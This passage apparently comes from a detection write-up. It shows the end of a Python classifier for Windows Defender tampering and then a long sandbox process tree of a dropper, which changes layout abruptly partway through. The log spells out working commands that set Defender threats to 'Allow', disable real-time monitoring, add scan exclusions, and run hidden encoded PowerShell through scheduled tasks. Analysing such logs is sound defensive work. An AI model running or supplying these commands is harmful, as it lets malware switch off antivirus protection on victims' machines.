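    """(kind, detail) findings for one command line; empty list if nothing matches."""
    cmd = unwrap_proxies(cmd)
    m = VIEW_RE.search(cmd)
    view = m.group(1) if m else "native"
    findings = []
    m = THREAT_RE.search(cmd)
    if m:
        threat_id, code = m.groups()
        findings.append(("defender_threat_action", f"{threat_id}={ACTION_NAMES.get(code, code)}"))
    m = EXCL_EXT_RE.search(cmd)
    if m:
        findings.append(("defender_exclusion_extension", m.group(1).lower()))
    m = EXCL_PATH_RE.search(cmd)
    if m:
        findings.append(("defender_exclusion_path", m.group(1)))
    m = RTP_RE.search(cmd)
    if m:
        d = re.search(r'/d\s+(\d+)', cmd)
        disabled = m.group(1).lower() == "add" and d is not None and d.group(1) != "0"
        kind = "defender_realtime_disabled" if disabled else "defender_realtime_restored"
        findings.append((kind, view))
    return findings


def analyse(lines):
    """Sorted, de-duplicated findings over many command lines."""
    return sorted({f for line in lines for f in classify(line)})


if __name__ == "__main__":
    for kind, detail in analyse(SAMPLE_COMMAND_LINES):
        print(f"{kind:32} {detail}")
```

Unwrapping first is the point: a rule that keys on the parent image alone sees only forfiles.exe launching cmd.exe, while the registry key and the "Allow" action are only visible in the innermost command. The numeric threat IDs can be resolved on a Defender host with Get-MpThreatCatalog.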
C:\Windows\system32\taskeng.exetaskeng.exe {3B30062D-F970-4E37-9734-8D823D3745AA} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:2052
-
C:\Users\Admin\AppData\Local\Temp\olrZuEJhuzUWbFuCi\iXTuROILDACSXYD\YBLNFyl.exeC:\Users\Admin\AppData\Local\Temp\olrZuEJhuzUWbFuCi\iXTuROILDACSXYD\YBLNFyl.exe Hi /gdpdidfiz 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2068 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
- System Location Discovery: System Language Discovery
PID:1792 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:496 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:448
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵
- System Location Discovery: System Language Discovery
PID:1136
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:2092 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:1648
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵
- System Location Discovery: System Language Discovery
PID:320
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:1696 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:1944 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:948
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:1392 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:944
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵
- System Location Discovery: System Language Discovery
PID:1088
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵
- Indirect Command Execution
PID:2572 -
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵PID:1764
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1520 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵
- System Location Discovery: System Language Discovery
PID:2096
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gCsdWAqEI" /SC once /ST 00:16:09 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1784
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gCsdWAqEI"3⤵PID:2140
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gCsdWAqEI"3⤵PID:2904
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:2756 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:2820
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:2760 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:2852
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gcpmSykxt" /SC once /ST 02:28:02 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2980
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gcpmSykxt"3⤵PID:2204
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gcpmSykxt"3⤵
- System Location Discovery: System Language Discovery
PID:1352
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:768 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True4⤵
- System Location Discovery: System Language Discovery
PID:1536 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1356 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2728
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:323⤵PID:2696
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2008
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:1008 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:1000
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:323⤵PID:1692
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:324⤵PID:1656
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:2504 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:644⤵
- System Location Discovery: System Language Discovery
PID:2168
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\ErKIoDgHiflivqkZ\CYsQOwTc\uRthnpKRNaMTwjKB.wsf"3⤵
- System Location Discovery: System Language Discovery
PID:1592
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\ErKIoDgHiflivqkZ\CYsQOwTc\uRthnpKRNaMTwjKB.wsf"3⤵
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2560 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BnSeAqsvAhUdC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1092
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BnSeAqsvAhUdC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:320
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MivewcCGXeCU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MivewcCGXeCU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:1088
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TusZhOGSSwUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1460
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TusZhOGSSwUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:484
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZIWhWpltLlQHHUslkTR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1596
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZIWhWpltLlQHHUslkTR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:908
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rksWaXujU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1788
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rksWaXujU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:2256
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BiTaXhratCGNPnVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:1264
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BiTaXhratCGNPnVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1752
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:716
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2404
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\olrZuEJhuzUWbFuCi" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1296
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\olrZuEJhuzUWbFuCi" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1600
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1720
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BnSeAqsvAhUdC" /t REG_DWORD /d 0 /reg:324⤵PID:2684
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BnSeAqsvAhUdC" /t REG_DWORD /d 0 /reg:644⤵
- System Location Discovery: System Language Discovery
PID:1980
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MivewcCGXeCU2" /t REG_DWORD /d 0 /reg:324⤵
- System Location Discovery: System Language Discovery
PID:2036
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MivewcCGXeCU2" /t REG_DWORD /d 0 /reg:644⤵PID:2556
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TusZhOGSSwUn" /t REG_DWORD /d 0 /reg:324⤵PID:2300
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TusZhOGSSwUn" /t REG_DWORD /d 0 /reg:644⤵PID:2460
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZIWhWpltLlQHHUslkTR" /t REG_DWORD /d 0 /reg:324⤵PID:2752
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZIWhWpltLlQHHUslkTR" /t REG_DWORD /d 0 /reg:644⤵PID:2816
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rksWaXujU" /t REG_DWORD /d 0 /reg:324⤵PID:996
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rksWaXujU" /t REG_DWORD /d 0 /reg:644⤵
- System Location Discovery: System Language Discovery
PID:2196
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BiTaXhratCGNPnVB" /t REG_DWORD /d 0 /reg:324⤵PID:2876
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BiTaXhratCGNPnVB" /t REG_DWORD /d 0 /reg:644⤵PID:2492
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- System Location Discovery: System Language Discovery
PID:2668
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵PID:2616
-
-
      [depth 4] C:\Windows\SysWOW64\reg.exe
        Command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\olrZuEJhuzUWbFuCi" /t REG_DWORD /d 0 /reg:32
        - System Location Discovery: System Language Discovery
        PID: 3020

      [depth 4] C:\Windows\SysWOW64\reg.exe
        Command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\olrZuEJhuzUWbFuCi" /t REG_DWORD /d 0 /reg:64
        - System Location Discovery: System Language Discovery
        PID: 1524

      [depth 4] C:\Windows\SysWOW64\reg.exe
        Command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:32
        - System Location Discovery: System Language Discovery
        PID: 2912

      [depth 4] C:\Windows\SysWOW64\reg.exe
        Command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:64
        PID: 2688

    [depth 3] C:\Windows\SysWOW64\schtasks.exe
      Command line: schtasks /CREATE /TN "gbfUGSHgt" /SC once /ST 03:04:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
      - Scheduled Task/Job: Scheduled Task
      PID: 3024

    [depth 3] C:\Windows\SysWOW64\schtasks.exe
      Command line: schtasks /run /I /tn "gbfUGSHgt"
      PID: 2788

    [depth 3] C:\Windows\SysWOW64\schtasks.exe
      Command line: schtasks /DELETE /F /TN "gbfUGSHgt"
      - System Location Discovery: System Language Discovery
      PID: 1692

    [depth 3] C:\Windows\SysWOW64\cmd.exe
      Command line: cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
      PID: 2076

      [depth 4] C:\Windows\SysWOW64\reg.exe
        Command line: REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
        - System Location Discovery: System Language Discovery
        PID: 1672

    [depth 3] C:\Windows\SysWOW64\cmd.exe
      Command line: cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
      - System Location Discovery: System Language Discovery
      PID: 2128

      [depth 4] C:\Windows\SysWOW64\reg.exe
        Command line: REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
        PID: 1728

    [depth 3] C:\Windows\SysWOW64\schtasks.exe
      Command line: schtasks /CREATE /TN "mVwrlHrSDNRLOGqZG" /SC once /ST 03:13:12 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ErKIoDgHiflivqkZ\WnSrIDIgFqFuSvw\gLYDEcB.exe\" uL /NafCdidyF 525403 /S" /V1 /F
      - Drops file in Windows directory
      - Scheduled Task/Job: Scheduled Task
      PID: 448

    [depth 3] C:\Windows\SysWOW64\schtasks.exe
      Command line: schtasks /run /I /tn "mVwrlHrSDNRLOGqZG"
      - System Location Discovery: System Language Discovery
      PID: 2580

    [depth 3] C:\Windows\SysWOW64\WerFault.exe
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2068 -s 628
      - Loads dropped DLL
      - Program crash
      PID: 1148

  [depth 2] C:\Windows\Temp\ErKIoDgHiflivqkZ\WnSrIDIgFqFuSvw\gLYDEcB.exe
    Command line: C:\Windows\Temp\ErKIoDgHiflivqkZ\WnSrIDIgFqFuSvw\gLYDEcB.exe uL /NafCdidyF 525403 /S
    - Checks computer location settings
    - Executes dropped EXE
    - Drops Chrome extension
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    PID: 612

    [depth 3] C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
      PID: 1764

      [depth 4] C:\Windows\SysWOW64\forfiles.exe
        Command line: forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        - Indirect Command Execution
        PID: 1560

        [depth 5] C:\Windows\SysWOW64\cmd.exe
          Command line: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
          - System Location Discovery: System Language Discovery
          PID: 1596

          [depth 6] \??\c:\windows\SysWOW64\reg.exe
            Command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
            - System Location Discovery: System Language Discovery
            PID: 1792

      [depth 4] C:\Windows\SysWOW64\forfiles.exe
